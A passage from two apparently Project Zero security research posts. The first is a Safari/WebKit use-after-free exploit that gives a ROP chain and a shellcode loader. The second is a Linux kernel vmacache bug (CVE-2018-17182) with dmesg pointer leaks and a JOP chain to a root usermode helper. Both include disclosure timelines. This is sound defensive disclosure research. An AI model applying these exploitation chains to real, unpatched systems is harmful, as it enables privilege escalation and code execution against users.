As Apple recently introduced the Gigacage (a separate large region of memory) for a lot of attacker-controlled datatypes (strings, arrays, etc.), this is no longer trivial. However, one thing still allocated on the main heap is Vector content. By finding a vector whose content we fully control, we can overcome the heap limitations.
What I ended up using is a temporary vector used when TypedArray.set() is called to copy values from one JavaScript typed array into another. This vector is temporary, meaning it will be deleted immediately after use, but again, due to how memory allocation works in WebKit, this is not too horrible. Like other stability improvements, the task of finding a more permanent controllable allocation is left as an exercise for the reader. :-)
This time, in the JavaScript event handler, we can replace the freed SVGAnimatedTypeAnimator with a vector whose first 8 bytes are set to point to the ROP chain + shellcode payload.
The ROP chain is pretty straightforward, but one thing that is perhaps more interesting is the stack pivot gadget (or, in this case, gadgets) used. In the scenario we have, the virtual function on the freed object is called as
call qword ptr [rax+10h]
where rax points to our payload. Additionally, rsi points to the freed object (which we now also control). The first thing we want to do for ROP is control the stack, but I was unable to find any “classic” gadgets that accomplish this, such as:
mov rsp, rax; ret;
push rax; pop rsp; ret;
xchg rax, rsp; ret;
What I ended up doing is breaking the stack pivot into two gadgets:
push rax; mov rax, [rsi]; call [rax + offset];
This first gadget pushes the payload address onto the stack and is very common because, after all, that’s exactly how the original virtual function was called (apart from the push rax, which can be the epilogue of some other instruction). The second gadget can then be
pop whatever; pop rsp; ret;
where the first pop removes the return address pushed by the call from the stack and the second pop finally gets the controlled value into rsp. This gadget is less common, but still appears to be far more common than the stack pivots mentioned previously, at least in our binary.
The final ROP chain is (remember to start reading from offset 0x10):
[address of pop; pop; pop; ret]
0
[address of push rax; mov rax, [rsi], call [rax+0x28]];
0
[address of pop; ret]
[address of pop rbp; pop rsp; ret;]
[address of pop rdi; ret]
0
[address of pop rsi; ret]
shellcode length
[address of pop rdx; ret]
PROT_EXEC + PROT_READ + PROT_WRITE
[address of pop rcx; ret]
MAP_ANON + MAP_PRIVATE
[address of pop r8; pop rbp; ret]
-1
0
[address of pop r9; ret]
0
[address of mmap]
[address of push rax; pop rdi; ret]
[address of push rsp; pop rbp; ret]
[address of push rbp; pop rax; ret]
[address of add rax, 0x50; pop rbp; ret]
0
[address of push rax; pop rsi; pop rbp; ret]
0
[address of pop rdx; ret]
shellcode length
[address of memcpy]
[address of jmp rax;]
0
shellcode
The ROP chain calls
mmap(0, shellcode_length, PROT_EXEC | PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0)
It then calculates the shellcode address, copies the shellcode to the address returned by mmap(), and finally jumps to it.
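In C terms, the effect of the chain is roughly the following (a sketch of the equivalent operation only, not code from the exploit; MAP_ANON availability is platform-dependent):

#include <string.h>
#include <sys/mman.h>

static void run_shellcode(const unsigned char *shellcode, size_t len) {
    void *buf = mmap(0, len, PROT_EXEC | PROT_READ | PROT_WRITE,
                     MAP_ANON | MAP_PRIVATE, -1, 0);
    if (buf == MAP_FAILED)
        return;
    memcpy(buf, shellcode, len); /* the chain computes the source address itself */
    ((void (*)(void))buf)();     /* the final 'jmp rax' */
}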
In our case, the shellcode is just a sequence of ‘int 3’ instructions, so when it is reached, Safari will crash. If a debugger is attached, it will report a breakpoint, showing that the shellcode was successfully reached:
Process 5833 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BREAKPOINT (code=EXC_I386_BPT, subcode=0x0)
    frame #0: 0x00000001b1b83001
->  0x1b1b83001: int3
    0x1b1b83002: int3
    0x1b1b83003: int3
    0x1b1b83004: int3
Target 0: (com.apple.WebKit.WebContent) stopped.
In a real-world scenario, the shellcode could either be a second-stage exploit that breaks out of the Safari sandbox or, alternatively, a payload that turns the issue into a universal XSS, stealing cross-domain data.
The exploit was successfully tested on Mac OS 10.13.6 (build version 17G65). If you are still using this version, you might want to update. The full exploit can be seen here.
The impact of recent iOS mitigations
An interesting aspect of this exploit is that, on Safari for macOS, it could be written in a very “old-school” way (infoleak + ROP) due to the lack of control-flow mitigations on the platform.
On the latest mobile hardware, with iOS 12 (released after the exploit was already written), Apple introduced control-flow mitigations in the form of Pointer Authentication Codes (PAC). While there are no plans to write another version of the exploit at this time, it is interesting to discuss how the exploit could be modified so as not to be affected by these recent mitigations.
The exploit, as presented here, consists of two parts: the infoleak and getting code execution. PAC would not affect the infoleak part in any way; however, it would prevent jumping to the ROP chain in the second part of the exploit, because we could not forge a correct signature for the vtable pointer.
Instead of jumping to the ROP code, the next stage of the exploit would likely need to be getting an arbitrary read-write primitive. This could potentially be accomplished by exploiting a type confusion similar to the one used for the infoleak, but with a different object combination. I did notice that there are some type combinations that could result in a write (especially if the attacker already has an infoleak), but I didn’t investigate those in detail.
In the WebKit process, after the attacker has an arbitrary read-write primitive, they could find a way to overwrite JIT code (or, failing that, other data that would cause fully or partially controlled JIT code to be emitted) and achieve code execution that way.
So while the exploit could still be written, it would admittedly be somewhat more difficult to write.
On publishing the advisories
Before concluding this blog post, we want to draw some attention to how the patches for the issues described here were announced, and to the corresponding timeline. The issues were reported to Apple between June 15 and July 2, 2018. On September 17, 2018, Apple published security advisories for iOS 12, tvOS 12 and Safari 12, which fixed all of the issues. However, although the bugs were fixed at that time, the corresponding advisories did not initially mention them. The issues described in this blog post were only added to the advisories one week later, on September 24, 2018, when the security advisories for macOS Mojave 10.14 were also published.
To demonstrate the discrepancy between originally published advisories and the updated advisories, compare the archived version of Safari 12 advisories from September 18 here and the current version of the same advisories here (note that you might need to refresh the page if you still have the old version in your browser’s cache).
The original advisories most likely didn’t include all the issues because Apple wanted to wait for the issues to also be fixed on macOS before adding them. However, this practice is misleading, because customers interested in the Apple security advisories would most likely read them only once, when they are first released, and the impression they would get is that the product updates fix fewer and less severe vulnerabilities than is actually the case.
Furthermore, the practice of not publishing fixes for mobile and desktop operating systems at the same time can put desktop customers at unnecessary risk, because attackers could reverse-engineer the patches from the mobile updates and develop exploits against desktop products, while desktop customers would have no way to update and protect themselves.
Conclusion
While there were clearly improvements in the WebKit DOM when tested with Domato, the now-public fuzzer was still able to find a large number of interesting bugs in a relatively modest number of iterations. And if a public tool was able to find that many bugs, private ones might well be even more successful.
And while it is easy to brush away such bugs as something we haven’t seen actual attackers use, that doesn’t mean it isn’t happening or that it couldn’t happen, as the provided exploit demonstrates. The exploit doesn’t include a sandbox escape, so it can’t be considered a full chain; however, reports from other security researchers indicate that this other aspect of browser security, too, cracks under fuzzing (note from Apple Security: this sandbox escape relies on attacking the WindowServer, access to which has been removed from the sandbox in Safari 12 on macOS Mojave 10.14). Additionally, a DOM exploit could be used to steal cross-domain data such as cookies even without a sandbox escape.
The fuzzing results might indicate that WebKit is getting fuzzed, but perhaps not with sufficient computing power to find all fuzzable, newly introduced bugs before they make it into the release version of the browser. We are hoping that this research will lead to improved user security by providing an incentive for Apple to allocate more resources into this area of browser security.

A cache invalidation bug in Linux memory management

Wed, 09/26/2018 - 13:16
Posted by Jann Horn, Google Project Zero
This blogpost describes a way to exploit a Linux kernel bug (CVE-2018-17182) that has existed since kernel version 3.16. While the bug itself is in code that is reachable even from relatively strongly sandboxed contexts, this blogpost only describes a way to exploit it in environments that use Linux kernels that haven't been configured for increased security (specifically, Ubuntu 18.04 with kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37). This demonstrates how the kernel configuration can have a big impact on the difficulty of exploiting a kernel bug.
The bug report and the exploit are filed in our issue tracker as issue 1664.
Fixes for the issue are in the upstream stable releases 4.18.9, 4.14.71, 4.9.128, 4.4.157 and 3.16.58.
The bug
Whenever a userspace page fault occurs because e.g. a page has to be paged in on demand, the Linux kernel has to look up the VMA (virtual memory area; struct vm_area_struct) that contains the fault address to figure out how the fault should be handled. The slowpath for looking up a VMA (in find_vma()) has to walk a red-black tree of VMAs. To avoid this performance hit, Linux also has a fastpath that can bypass the tree walk if the VMA was recently used.
The implementation of the fastpath has changed over time; since version 3.15, Linux uses per-thread VMA caches with four slots, implemented in mm/vmacache.c and include/linux/vmacache.h. Whenever a successful lookup has been performed through the slowpath, vmacache_update() stores a pointer to the VMA in an entry of the array current->vmacache.vmas, allowing the next lookup to use the fastpath.
Note that VMA caches are per-thread, but VMAs are associated with a whole process (more precisely with a struct mm_struct; from now on, this distinction will largely be ignored, since it isn't relevant to this bug). Therefore, when a VMA is freed, the VMA caches of all threads must be invalidated - otherwise, the next VMA lookup would follow a dangling pointer. However, since a process can have many threads, simply iterating through the VMA caches of all threads would be a performance problem.
To solve this, both the struct mm_struct and the per-thread struct vmacache are tagged with sequence numbers; when the VMA lookup fastpath discovers in vmacache_valid() that current->vmacache.seqnum and current->mm->vmacache_seqnum don't match, it wipes the contents of the current thread's VMA cache and updates its sequence number.
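As a userspace model of this scheme (a simplified sketch; the names and sizes approximate the code in mm/vmacache.c but are not the kernel's exact definitions):

#include <stdint.h>
#include <string.h>

#define VMACACHE_SIZE 4

struct vma; /* stand-in for struct vm_area_struct */

struct vmacache_sketch {
    uint32_t seqnum;                 /* compared against mm->vmacache_seqnum */
    struct vma *vmas[VMACACHE_SIZE];
};

/* returns 0 and wipes the per-thread cache if it is stale */
static int vmacache_valid_sketch(struct vmacache_sketch *vc, uint32_t mm_seqnum) {
    if (vc->seqnum != mm_seqnum) {
        memset(vc->vmas, 0, sizeof(vc->vmas));
        vc->seqnum = mm_seqnum;
        return 0;
    }
    return 1;
}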
The sequence numbers of the mm_struct and the VMA cache were only 32 bits wide, meaning that it was possible for them to overflow. To ensure that a VMA cache can't incorrectly appear to be valid when current->mm->vmacache_seqnum has actually been incremented 2^32 times, vmacache_invalidate() (the helper that increments current->mm->vmacache_seqnum) had a special case: When current->mm->vmacache_seqnum wrapped to zero, it would call vmacache_flush_all() to wipe the contents of all VMA caches associated with current->mm. Executing vmacache_flush_all() was very expensive: It would iterate over every thread on the entire machine, check which struct mm_struct it is associated with, then if necessary flush the thread's VMA cache.
In version 3.16, an optimization was added: If the struct mm_struct was only associated with a single thread, vmacache_flush_all() would do nothing, based on the realization that every VMA cache invalidation is preceded by a VMA lookup; therefore, in a single-threaded process, the VMA cache's sequence number is always close to the mm_struct's sequence number:
	/*
	 * Single threaded tasks need not iterate the entire
	 * list of process. We can avoid the flushing as well
	 * since the mm's seqnum was increased and don't have
	 * to worry about other threads' seqnum. Current's
	 * flush will occur upon the next lookup.
	 */
	if (atomic_read(&mm->mm_users) == 1)
		return;
However, this optimization is incorrect because it doesn't take into account what happens if a previously single-threaded process creates a new thread immediately after the mm_struct's sequence number has wrapped around to zero. In this case, the sequence number of the first thread's VMA cache will still be 0xffffffff, and the second thread can drive the mm_struct's sequence number up to 0xffffffff again. At that point, the first thread's VMA cache, which can contain dangling pointers, will be considered valid again, permitting the use of freed VMA pointers in the first thread's VMA cache.
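The wraparound can be modeled in userspace arithmetic (an illustration only; the loop stands in for the roughly 2^32 invalidations the real exploit has to drive through syscalls):

#include <stdint.h>
#include <stdio.h>

int main(void) {
    /* thread A performs a lookup while the 32-bit counter is at its maximum */
    uint32_t mm_seqnum = 0xffffffff;
    uint32_t thread_a_seqnum = mm_seqnum; /* cache now holds soon-dangling pointers */

    mm_seqnum++; /* wraps to 0; with mm_users == 1, vmacache_flush_all() bails out */

    /* a newly created second thread drives the counter back up */
    for (uint64_t i = 0; i < 0xffffffffULL; i++)
        mm_seqnum++;

    /* thread A's stale cache now compares as valid again */
    printf("stale cache considered valid: %d\n", thread_a_seqnum == mm_seqnum);
    return 0;
}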
The bug was fixed by changing the sequence numbers to 64 bits, thereby making an overflow infeasible, and removing the overflow handling logic.
Reachability and Impact
Fundamentally, this bug can be triggered by any process that can run for a sufficiently long time to overflow the sequence number (about an hour if MAP_FIXED is usable) and has the ability to use mmap()/munmap() (to manage memory mappings) and clone() (to create a thread). These syscalls do not require any privileges, and they are often permitted even in seccomp-sandboxed contexts, such as the Chrome renderer sandbox (mmap, munmap, clone), the sandbox of the main gVisor host component, and Docker's seccomp policy.
To make things easy, my exploit uses various other kernel interfaces, and therefore doesn't work out of the box from inside such sandboxes; in particular, it uses /dev/kmsg to read dmesg logs and uses an eBPF array to spam the kernel's page allocator with user-controlled, mutable single-page allocations. However, an attacker willing to invest more time into an exploit would probably be able to avoid using such interfaces.
Interestingly, it looks like Docker in its default config doesn't prevent containers from accessing the host's dmesg logs if the kernel permits dmesg access for normal users - while /dev/kmsg doesn't exist in the container, the seccomp policy whitelists the syslog() syscall for some reason.
BUG_ON(), WARN_ON_ONCE(), and dmesg
The function in which the first use-after-free access occurs is vmacache_find(). When this function was first added - before the bug was introduced - it accessed the VMA cache as follows:
      for (i = 0; i < VMACACHE_SIZE; i++) {
              struct vm_area_struct *vma = current->vmacache[i];

              if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
                      BUG_ON(vma->vm_mm != mm);
                      return vma;
              }
      }
When this code encountered a cached VMA whose bounds contain the supplied address addr, it checked whether the VMA's ->vm_mm pointer matches the expected mm_struct - which should always be the case, unless a memory safety problem has happened - and if not, terminated with a BUG_ON() assertion failure. BUG_ON() is intended to handle cases in which a kernel thread detects a severe problem that can't be cleanly handled by bailing out of the current context. In a default upstream kernel configuration, BUG_ON() will normally print a backtrace with register dumps to the dmesg log buffer, then forcibly terminate the current thread. This can sometimes prevent the rest of the system from continuing to work properly - for example, if the crashing code held an important lock, any other thread that attempts to take that lock will then deadlock - but it is often successful in keeping the rest of the system in a reasonably usable state. Only when the kernel detects that the crash happened in a critical context such as an interrupt handler does it bring down the whole system with a kernel panic.
The same handler code is used for dealing with unexpected crashes in kernel code, like page faults and general protection faults at non-whitelisted addresses: By default, if possible, the kernel will attempt to terminate only the offending thread.
The handling of kernel crashes is a tradeoff between availability, reliability and security. A system owner might want a system to keep running as long as possible, even if parts of the system are crashing, if a sudden kernel panic would cause data loss or downtime of an important service. Similarly, a system owner might want to debug a kernel bug on a live system, without an external debugger; if the whole system terminated as soon as the bug was triggered, it might be harder to debug the issue properly.

On the other hand, an attacker attempting to exploit a kernel bug might benefit from the ability to retry an attack multiple times without triggering system reboots; and an attacker with the ability to read the crash log produced by the first attempt might even be able to use that information for a more sophisticated second attempt.
The kernel provides two sysctls that can be used to adjust this behavior, depending on the desired tradeoff:
  • kernel.panic_on_oops will automatically cause a kernel panic when a BUG_ON() assertion triggers or the kernel crashes; its initial value can be configured using the build configuration variable CONFIG_PANIC_ON_OOPS. It is off by default in the upstream kernel - and enabling it by default in distributions would probably be a bad idea -, but it is e.g. enabled by Android.
  • kernel.dmesg_restrict controls whether non-root users can access dmesg logs, which, among other things, contain register dumps and stack traces for kernel crashes; its initial value can be configured using the build configuration variable CONFIG_SECURITY_DMESG_RESTRICT. It is off by default in the upstream kernel, but is enabled by some distributions, e.g. Debian. (Android relies on SELinux to block access to dmesg.)

Ubuntu, for example, enables neither of these.

The code snippet from above was amended in the same month as it was committed:
       for (i = 0; i < VMACACHE_SIZE; i++) {
                struct vm_area_struct *vma = current->vmacache[i];

-               if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
-                       BUG_ON(vma->vm_mm != mm);
+               if (!vma)
+                       continue;
+               if (WARN_ON_ONCE(vma->vm_mm != mm))
+                       break;
+               if (vma->vm_start <= addr && vma->vm_end > addr)
                        return vma;
-               }
        }
This amended code is what distributions like Ubuntu are currently shipping.
The first change here is that the sanity check for a dangling pointer happens before the address comparison. The second change is somewhat more interesting: BUG_ON() is replaced with WARN_ON_ONCE().
WARN_ON_ONCE() prints debug information to dmesg that is similar to what BUG_ON() would print. The differences from BUG_ON() are that WARN_ON_ONCE() only prints debug information the first time it triggers, and that execution continues: now, when the kernel detects a dangling pointer in the VMA cache lookup fastpath - in other words, when it heuristically detects that a use-after-free has happened - it just bails out of the fastpath and falls back to the red-black tree walk. The process continues normally.
This fits in with the kernel's policy of attempting to keep the system running as much as possible by default; if an accidental use-after-free bug occurs here for some reason, the kernel can probably heuristically mitigate its effects and keep the process working.
The policy of only printing a warning even when the kernel has discovered a memory corruption is problematic for systems that should kernel panic when the kernel notices security-relevant events like kernel memory corruption. Simply making WARN() trigger kernel panics isn't really an option because WARN() is also used for various events that are not important to the kernel's security. For this reason, a few uses of WARN_ON() in security-relevant places have been replaced with CHECK_DATA_CORRUPTION(), which permits toggling the behavior between BUG() and WARN() at kernel configuration time. However, CHECK_DATA_CORRUPTION() is only used in the linked list manipulation code and in addr_limit_user_check(); the check in the VMA cache, for example, still uses a classic WARN_ON_ONCE().

A third important change was made to this function; however, this change is relatively recent and will first be in the 4.19 kernel, which hasn't been released yet, so it is irrelevant for attacking currently deployed kernels.
        for (i = 0; i < VMACACHE_SIZE; i++) {
-               struct vm_area_struct *vma = current->vmacache.vmas[i];
+               struct vm_area_struct *vma = current->vmacache.vmas[idx];

-               if (!vma)
-                       continue;
-               if (WARN_ON_ONCE(vma->vm_mm != mm))
-                       break;
-               if (vma->vm_start <= addr && vma->vm_end > addr) {
-                       count_vm_vmacache_event(VMACACHE_FIND_HITS);
-                       return vma;
+               if (vma) {
+#ifdef CONFIG_DEBUG_VM_VMACACHE
+                       if (WARN_ON_ONCE(vma->vm_mm != mm))
+                               break;
+#endif
+                       if (vma->vm_start <= addr && vma->vm_end > addr) {
+                               count_vm_vmacache_event(VMACACHE_FIND_HITS);
+                               return vma;
+                       }
                }
+               if (++idx == VMACACHE_SIZE)
+                       idx = 0;
        }
After this change, the sanity check is skipped altogether unless the kernel is built with the debugging option CONFIG_DEBUG_VM_VMACACHE.
The exploit: Incrementing the sequence number
The exploit has to increment the sequence number roughly 2^33 times. Therefore, the efficiency of the primitive used to increment the sequence number is important for the runtime of the whole exploit.
It is possible to cause two sequence number increments per syscall as follows: Create an anonymous VMA that spans three pages. Then repeatedly use mmap() with MAP_FIXED to replace the middle page with an equivalent VMA. This causes mmap() to first split the VMA into three VMAs, then replace the middle VMA, and then merge the three VMAs together again, causing VMA cache invalidations for the two VMAs that are deleted while merging the VMAs.
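A minimal sketch of this primitive (error handling omitted; the loop bound follows from needing roughly 2^33 increments at two per call):

#include <sys/mman.h>

int main(void) {
    /* anonymous VMA spanning three pages */
    char *base = mmap(NULL, 3 * 0x1000, PROT_READ | PROT_WRITE,
                      MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    for (unsigned long long i = 0; i < (1ULL << 32); i++) {
        /* MAP_FIXED replacement of the middle page: split into three VMAs,
           replace the middle one, re-merge - the two VMAs deleted during the
           merge each trigger a VMA cache invalidation */
        mmap(base + 0x1000, 0x1000, PROT_READ | PROT_WRITE,
             MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
    }
    return 0;
}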
The exploit: Replacing the VMA
Enumerating all potential ways to attack the use-after-free without releasing the slab's backing page (according to /proc/slabinfo, the Ubuntu kernel uses one page per vm_area_struct slab) back to the buddy allocator / page allocator:
  1. Get the vm_area_struct reused in the same process. The process would then be able to use this VMA, but this doesn't result in anything interesting, since the VMA caches of the process would be allowed to contain pointers to the VMA anyway.
  2. Free the vm_area_struct such that it is on the slab allocator's freelist, then attempt to access it. However, at least the SLUB allocator that Ubuntu uses replaces the first 8 bytes of the vm_area_struct (which contain vm_start, the userspace start address) with a kernel address. This makes it impossible for the VMA cache lookup function to return it, since the condition vma->vm_start <= addr && vma->vm_end > addr can't be fulfilled, and therefore nothing interesting happens.
  3. Free the vm_area_struct such that it is on the slab allocator's freelist, then allocate it in another process. This would (with the exception of a very narrow race condition that can't easily be triggered repeatedly) result in hitting the WARN_ON_ONCE(), and therefore the VMA cache lookup function wouldn't return the VMA.
  4. Free the vm_area_struct such that it is on the slab allocator's freelist, then make an allocation from a slab that has been merged with the vm_area_struct slab. This requires the existence of an aliasing slab; in an Ubuntu 18.04 VM, no such slab seems to exist.

Therefore, to exploit this bug, it is necessary to release the backing page back to the page allocator, then reallocate the page in some way that permits placing controlled data in it. There are various kernel interfaces that could be used for this; for example:
pipe pages:
  • advantage: not wiped on allocation
  • advantage: permits writing at an arbitrary in-page offset if splice() is available
  • advantage: page-aligned
  • disadvantage: can't do multiple writes without first freeing the page, then reallocating it

BPF maps:
  • advantage: can repeatedly read and write contents from userspace
  • advantage: page-aligned
  • disadvantage: wiped on allocation

This exploit uses BPF maps.
The exploit: Leaking pointers from dmesg
The exploit wants to have the following information:
  • address of the mm_struct
  • address of the use-after-free'd VMA
  • load address of kernel code

At least in the Ubuntu 18.04 kernel, the first two of these are directly visible in the register dump triggered by WARN_ON_ONCE(), and can therefore easily be extracted from dmesg: The mm_struct's address is in RDI, and the VMA's address is in RAX. However, an instruction pointer is not directly visible because RIP and the stack are symbolized, and none of the general-purpose registers contain an instruction pointer.
A kernel backtrace can contain multiple sets of registers: When the stack backtracing logic encounters an interrupt frame, it generates another register dump. Since we can trigger the WARN_ON_ONCE() through a page fault on a userspace address, and page faults on userspace addresses can happen at any userspace memory access in syscall context (via copy_from_user()/copy_to_user()/...), we can pick a call site that has the relevant information in a register from a wide range of choices. It turns out that writing to an eventfd triggers a usercopy while R8 still contains the pointer to the eventfd_fops structure.
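As a sketch of how such a fault can be provoked deliberately (assumed setup, error handling omitted): the first access to a fresh anonymous mapping faults, so using it as the source buffer of an eventfd write makes copy_from_user() fault in syscall context, on the path that reaches find_vma():

#include <sys/eventfd.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void) {
    int efd = eventfd(0, 0);
    /* fresh anonymous mapping: no page table entries yet, so the
       first access faults */
    void *page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                      MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    /* copy_from_user() on the 8-byte eventfd counter faults, taking the
       page-fault path through find_vma()/vmacache_find() */
    write(efd, page, 8);
    close(efd);
    return 0;
}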
When the exploit runs, it replaces the VMA with zeroed memory, then triggers a VMA lookup against the broken VMA cache, intentionally triggering the WARN_ON_ONCE(). This generates a warning that looks as follows; the values leaked to the exploit are RDI and RAX in the first register dump and R8 in the second:
[ 3482.271265] WARNING: CPU: 0 PID: 1871 at /build/linux-SlLHxe/linux-4.15.0/mm/vmacache.c:102 vmacache_find+0x9c/0xb0
[...]
[ 3482.271298] RIP: 0010:vmacache_find+0x9c/0xb0
[ 3482.271299] RSP: 0018:ffff9e0bc2263c60 EFLAGS: 00010203
[ 3482.271300] RAX: ffff8c7caf1d61a0 RBX: 00007fffffffd000 RCX: 0000000000000002
[ 3482.271301] RDX: 0000000000000002 RSI: 00007fffffffd000 RDI: ffff8c7c214c7380
[ 3482.271301] RBP: ffff9e0bc2263c60 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271302] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8c7c214c7380
[ 3482.271303] R13: ffff9e0bc2263d58 R14: ffff8c7c214c7380 R15: 0000000000000014
[ 3482.271304] FS:  00007f58c7bf6a80(0000) GS:ffff8c7cbfc00000(0000) knlGS:0000000000000000
[ 3482.271305] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3482.271305] CR2: 00007fffffffd000 CR3: 00000000a143c004 CR4: 00000000003606f0
[ 3482.271308] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 3482.271309] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 3482.271309] Call Trace:
[ 3482.271314]  find_vma+0x1b/0x70
[ 3482.271318]  __do_page_fault+0x174/0x4d0
[ 3482.271320]  do_page_fault+0x2e/0xe0
[ 3482.271323]  do_async_page_fault+0x51/0x80
[ 3482.271326]  async_page_fault+0x25/0x50
[ 3482.271329] RIP: 0010:copy_user_generic_unrolled+0x86/0xc0
[ 3482.271330] RSP: 0018:ffff9e0bc2263e08 EFLAGS: 00050202
[ 3482.271330] RAX: 00007fffffffd008 RBX: 0000000000000008 RCX: 0000000000000001
[ 3482.271331] RDX: 0000000000000000 RSI: 00007fffffffd000 RDI: ffff9e0bc2263e30
[ 3482.271332] RBP: ffff9e0bc2263e20 R08: ffffffffa7243680 R09: 0000000000000002
[ 3482.271333] R10: ffff8c7bb4497738 R11: 0000000000000000 R12: ffff9e0bc2263e30
[ 3482.271333] R13: ffff8c7bb4497700 R14: ffff8c7cb7a72d80 R15: ffff8c7bb4497700
[ 3482.271337]  ? _copy_from_user+0x3e/0x60
[ 3482.271340]  eventfd_write+0x74/0x270
[ 3482.271343]  ? common_file_perm+0x58/0x160
[ 3482.271345]  ? wake_up_q+0x80/0x80
[ 3482.271347]  __vfs_write+0x1b/0x40
[ 3482.271348]  vfs_write+0xb1/0x1a0
[ 3482.271349]  SyS_write+0x55/0xc0
[ 3482.271353]  do_syscall_64+0x73/0x130
[ 3482.271355]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 3482.271356] RIP: 0033:0x55a2e8ed76a6
[ 3482.271357] RSP: 002b:00007ffe71367ec8 EFLAGS: 00000202 ORIG_RAX: 0000000000000001
[ 3482.271358] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000055a2e8ed76a6
[ 3482.271358] RDX: 0000000000000008 RSI: 00007fffffffd000 RDI: 0000000000000003
[ 3482.271359] RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271359] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffe71367ec8
[ 3482.271360] R13: 00007fffffffd000 R14: 0000000000000009 R15: 0000000000000000
[ 3482.271361] Code: 00 48 8b 84 c8 10 08 00 00 48 85 c0 74 11 48 39 78 40 75 17 48 39 30 77 06 48 39 70 08 77 8d 83 c2 01 83 fa 04 75 ce 31 c0 5d c3 <0f> 0b 31 c0 5d c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f
[ 3482.271381] ---[ end trace bf256b6e27ee4552 ]---
At this point, the exploit can create a fake VMA that contains the correct mm_struct pointer (leaked from RDI). It also populates other fields with references to fake data structures (by creating pointers back into the fake VMA using the leaked VMA pointer from RAX) and with pointers into the kernel's code (using the leaked R8 from the page fault exception frame to bypass KASLR).
The exploit: JOP (the boring part)
It is probably possible to exploit this bug in some really elegant way by abusing the ability to overlay a fake writable VMA over existing readonly pages, or something like that; however, this exploit just uses classic jump-oriented programming.
To trigger the use-after-free a second time, a writing memory access is performed on an address that has no pagetable entries. At this point, the kernel's page fault handler comes in via page_fault -> do_page_fault -> __do_page_fault -> handle_mm_fault -> __handle_mm_fault -> handle_pte_fault -> do_fault -> do_shared_fault -> __do_fault, at which point it performs an indirect call:
static int __do_fault(struct vm_fault *vmf)
{
	struct vm_area_struct *vma = vmf->vma;
	int ret;

	ret = vma->vm_ops->fault(vmf);
vma is the VMA structure we control, so at this point, we can gain instruction pointer control. R13 contains a pointer to vma. The JOP chain that is used from there on follows; it is quite crude (for example, it crashes after having done its job), but it works.
First, to move the VMA pointer to RDI:
ffffffff810b5c21: 49 8b 45 70           mov rax,QWORD PTR [r13+0x70]
ffffffff810b5c25: 48 8b 80 88 00 00 00  mov rax,QWORD PTR [rax+0x88]
ffffffff810b5c2c: 48 85 c0              test rax,rax
ffffffff810b5c2f: 74 08                 je ffffffff810b5c39
ffffffff810b5c31: 4c 89 ef              mov rdi,r13
ffffffff810b5c34: e8 c7 d3 b4 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>
Then, to get full control over RDI:
ffffffff810a4aaa: 48 89 fb              mov rbx,rdi
ffffffff810a4aad: 48 8b 43 20           mov rax,QWORD PTR [rbx+0x20]
ffffffff810a4ab1: 48 8b 7f 28           mov rdi,QWORD PTR [rdi+0x28]
ffffffff810a4ab5: e8 46 e5 b5 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>
At this point, we can call into run_cmd(), which spawns a root-privileged usermode helper, using a space-delimited path and argument list as its only argument. This gives us the ability to run a binary we have supplied with root privileges. (Thanks to Mark for pointing out that if you control RDI and RIP, you don't have to try to do crazy things like flipping the SM*P bits in CR4, you can just spawn a usermode helper...)
After launching the usermode helper, the kernel crashes with a page fault because the JOP chain doesn't cleanly terminate; however, since that only kills the process in whose context the fault occurred, it doesn't really matter.
Fix timeline
This bug was reported 2018-09-12. Two days later, 2018-09-14, a fix was in the upstream kernel tree. This is exceptionally fast compared to the fix times of other software vendors. At this point, downstream vendors could theoretically backport and apply the patch. The bug is essentially public at this point, even if its security impact is obfuscated by the commit message - something that grsecurity frequently demonstrates.
However, a fix being in the upstream kernel does not automatically mean that users' systems are actually patched. The normal process for shipping fixes to users who use distribution kernels based on upstream stable branches works roughly as follows:
  1. A patch lands in the upstream kernel.
  2. The patch is backported to an upstream-supported stable kernel.
  3. The distribution merges the changes from upstream-supported stable kernels into its kernels.
  4. Users install the new distribution kernel.

Note that the patch becomes public after step 1, potentially allowing attackers to develop an exploit, but users are only protected after step 4.
In this case, the backports to the upstream-supported stable kernels 4.18, 4.14, 4.9 and 4.4 were published on 2018-09-19, five days after the patch became public, at which point the distributions could pull in the patch.
Upstream stable kernel updates are published very frequently. For example, looking at the last few stable releases for the 4.14 stable kernel, which is the newest upstream longterm maintenance release:
4.14.72 on 2018-09-26
4.14.71 on 2018-09-19
4.14.70 on 2018-09-15
4.14.69 on 2018-09-09
4.14.68 on 2018-09-05
4.14.67 on 2018-08-24
4.14.66 on 2018-08-22
The 4.9 and 4.4 longterm maintenance kernels are updated similarly frequently; only the 3.16 longterm maintenance kernel has not received any updates between the most recent update on 2018-09-25 (3.16.58) and the previous one on 2018-06-16 (3.16.57).
However, Linux distributions often don't publish distribution kernel updates very frequently. For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27. Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users - especially if the security impact is not announced publicly.
In this case, the security issue was announced on the oss-security mailing list on 2018-09-18, with a CVE allocation on 2018-09-19, making the need to ship new distribution kernels to users clearer. Still: As of 2018-09-26, both Debian and Ubuntu (in releases 16.04 and 18.04) track the bug as unfixed:
